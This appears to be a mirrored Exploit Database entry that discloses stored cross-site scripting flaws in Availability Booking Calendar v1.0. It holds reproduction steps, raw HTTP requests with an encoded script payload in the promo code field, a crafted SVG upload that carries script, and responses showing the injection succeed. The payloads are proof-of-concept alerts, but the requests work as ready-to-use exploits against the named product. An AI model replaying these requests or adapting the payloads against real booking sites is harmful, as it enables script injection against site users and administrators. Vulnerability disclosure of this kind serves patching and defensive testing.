Availability Booking Calendar v1.0 – Multiple Cross-site scripting (XSS)

• Exploit Database
• 112 阅读

• 作者： Andrey Stoykov
  日期： 2023-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51626/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115

  # Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) # Date: 07/2023 # Exploit Author: Andrey Stoykov # Tested on: Ubuntu 20.04 # Blog: http://msecureltd.blogspot.com     XSS #1:   Steps to Reproduce:   1. Browse to Bookings 2. Select All Bookings 3. Edit booking and select Promo Code 4. Enter payload TEST"><script>alert(<code>XSS</code>)</script>     // HTTP POST request   POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...]   [...] edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1 [...]   // HTTP response   HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 205 [...]       // HTTP GET request to Bookings page   GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...]     // HTTP response   HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 33590 [...]   [...] <label class="control-label" for="promo_code">Promo code:</label> <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(<code>XSS</code>)</script>" title="Promo code" placeholder=""> </div> [...]       Unrestricted File Upload #1:     // SVG file contents   <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">   <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(<code>XSS</code>); </script> </svg>     Steps to Reproduce:   1. Browse My Account 2. Image Browse -> Upload 3. Then right click on image 4. Select Open Image in New Tab     // HTTP POST request   POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...]   [...] -----------------------------13831219578609189241212424546 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml   <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">   <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(<code>XSS</code>); </script> </svg> [...]     // HTTP response   HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 190 [...]